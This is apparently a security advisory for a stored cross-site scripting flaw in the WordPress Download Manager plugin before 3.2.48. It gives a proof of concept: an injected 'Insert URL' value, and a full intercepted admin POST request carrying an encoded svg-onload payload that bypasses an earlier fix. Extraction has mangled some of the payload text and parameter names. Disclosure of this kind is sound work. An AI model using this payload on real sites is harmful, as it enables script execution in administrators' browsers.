Download Manager < 3.2.48 - Contributor+ Stored Cross-Site Scripting

The plugin does not sanitise and escape the ‘Insert URL’ field, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks. Note: The attempted fix made in 3.2.46 and 3.2.47 were found to be insufficient

PoC

As a contributor, create/edit a download and put the following payload in the 'Insert URL" field: https://example.com/?a=“> Then click on the + button next to the field to save the URL and click on the Submit for Review button The XSS will be triggered when editing the Download (for example when an admin will review it) In 3.2.47, the attack is still possible by adding a dummy URL, then intercepting the request made when saving the File Post and changing the file[files][] parameter to https://example.com/?a=”>: POST /wp-admin/post.php HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 1887 Connection: close Cookie: [admin+] Upgrade-Insecure-Requests: 1 _wpnonce=d1f3acca93&user;_ID=1&action;=editpost&originalaction;=editpost&post;_author=5&post;_type=wpdmpro&original;_post_status=publish&post;_ID=6324&meta-box-order-nonce;=0df29a4137&closedpostboxesnonce;=ac72c29968&post;_title=XSS+Contrib&samplepermalinknonce;=db423b3cbb&content;=&file;%5Bfiles%5D%5B%5D=https%3a%2f%2fexample.com%2f%3fa%3d%22%3e%3csvg%2fonload%3dalert(%2fXSS%2f)%3e&wp-preview;=&hidden;_post_status=publish&post;_status=publish&hidden;_post_password=&hidden;_post_visibility=public&visibility;=public&post;_password=&mm;=06&jj;=30&aa;=2022&hh;=22&mn;=21&ss;=28&hidden;_mm=06&cur;_mm=06&hidden;_jj=30&cur;_jj=30&hidden;_aa=2022&cur;_aa=2022&hidden;_hh=22&cur;_hh=22&hidden;_mn=21&cur;_mn=21&original;_publish=Update&save;=Update&tax;_input%5Bwpdmcategory%5D%5B%5D=0&newwpdmcategory;=New+Category+Name&newwpdmcategory;_parent=-1&_ajax_nonce-add-wpdmcategory=67f0ab91c8&tax;_input%5Bwpdmtag%5D=&newtag;%5Bwpdmtag%5D=&_thumbnail_id=-1&excerpt;=&metakeyselect;=%23NONE%23&metakeyinput;=&metavalue;=&_ajax_nonce-add-meta=925d3f1564&advanced;_view=1&comment;_status=open&add;_comment_nonce=d2ac60592b&_ajax_fetch_list_nonce=608563959a&post;_name=xss-contrib&post;_author_override=5&file;%5Bversion%5D=&file;%5Blink_label%5D=&file;%5Bquota%5D=&file;%5Bview_count%5D=1&file;%5Bdownload_count%5D=&file;%5Bpackage_size%5D=&file;%5Baccess%5D%5B%5D=guest&file;%5Bpage_template%5D=page-template-default.php&file;%5Bterms_page%5D=&file;%5Bterms_title%5D=&file;%5Bterms_conditions%5D=&file;%5Bterms_check_label%5D=&file;%5Bpassword%5D=&file;%5Bicon%5D=